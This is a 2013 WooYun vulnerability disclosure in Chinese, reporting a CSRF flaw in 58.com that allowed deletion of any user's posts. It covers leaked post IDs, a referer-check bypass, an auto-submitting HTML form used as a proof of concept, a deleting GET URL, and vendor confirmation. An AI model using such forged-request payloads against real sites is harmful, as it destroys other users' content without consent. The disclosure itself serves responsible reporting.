当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020862

漏洞标题:58同城可猥琐方式删除任意用户帖子

相关厂商:58同城

漏洞作者: se55i0n

提交时间:2013-03-29 09:21

修复时间:2013-05-13 09:21

公开时间:2013-05-13 09:21

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-29: 细节已通知厂商并且等待厂商处理中
2013-03-29: 厂商已经确认,细节仅向厂商公开
2013-04-08: 细节向核心白帽子及相关领域专家公开
2013-04-18: 细节向普通白帽子公开
2013-04-28: 细节向实习白帽子公开
2013-05-13: 细节向公众公开

简要描述:

58的大牛送一对公仔呗!

详细说明:

1)用户帖子ID信息泄露(后面删帖用到)、userid信息泄露(可与上个洞子配合使用);
1.1)发表一个帖子如下图所示;

1.png


1.2)在个人中心查看帖子信息;

2.png


1.3)看出来了吧,帖子的的页面地址为“帖子ID+x.shtml”,所以x前面的编号即为帖子ID;
1.4)使用另一用户查看刚发布的帖子,点击查看"该用户电话发帖记录",发现了用户的userid信息;

4.png


2)可猥琐删除任意用户帖子;
2.1)来到用户中心,点击删除刚发布的帖子并抓包;

POST /submit/infopost/?op=close HTTP/1.1
Host: my.58.com
Proxy-Connection: keep-alive
Content-Length: 18
Accept: text/plain, */*
Origin: http://my.58.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Content-Type: application/x-www-form-urlencoded
Referer: http://my.58.com/index/?pts=1364491912016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie:...
ids=13374799021446


2.2)系统校验了referer但是校验不严格,通过形如“my.58.com.xxx.org”之类即可绕过防御,所以通过访问以下POC即可删除用户对应帖子;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://my.58.com/submit/infopost/?op=close" method="POST">
<input type="text" name="ids" value="13374799021446" >
<input type="submit" value="submit" />
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


2.3)没有完,更猥琐的在这里,发现居然还能通过GET方式来提交删帖请求(不应该哟);

http://my.58.com/submit/infopost/?op=close&ids=13374799021446


2.5)再配合58同城的帮帮,在线交流,哈哈;

8.png


2.6)用户访问即可删帖,看效果;

6.png


2.7)返回用户中心,刷新下帖子真没了;

7.png


漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-03-29 11:30

厂商回复:

非常感谢提交漏洞,马上修复!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-29 09:50 | rqndx ( 路人 | Rank:9 漏洞数:3 | 种子发我邮箱:01010101010101010101010101...)

    不知道为何,提交那么久的漏洞一直未审核?还是因为太小了看不起人呢?新网域名过户XSS可得管理COOKIES,国土资源局密码外泄。

  2. 2013-03-29 10:05 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:172 )

    @rqndx 你可以漏洞链接发@xsser私信,不过你就爆他菊花*^_^*

  3. 2013-03-29 10:13 | rqndx ( 路人 | Rank:9 漏洞数:3 | 种子发我邮箱:01010101010101010101010101...)

    @se55i0n 。。 我说怎么哪里都能看到@xsser呢。。。原来是乌云的。。

  4. 2013-03-29 11:01 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @rqndx 怎么你到处都在发同样评论,职业灌水?

  5. 2013-04-30 16:58 | sysALong ( 路人 | Rank:19 漏洞数:5 | 电脑里的AV片 永远 和 电脑旁的卫生纸 成 ...)

    @se55i0n 乐死我了, 请问这个帖子是你的么? 一般人保证点击,点击后 后果不堪设想啊。

  6. 2013-05-13 10:15 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    @sysALong 本来还是的,点了后就不是了!

  7. 2013-05-13 12:18 | 小威 ( 普通白帽子 | Rank:492 漏洞数:67 | 活到老,学到老!)

    膜拜撸主~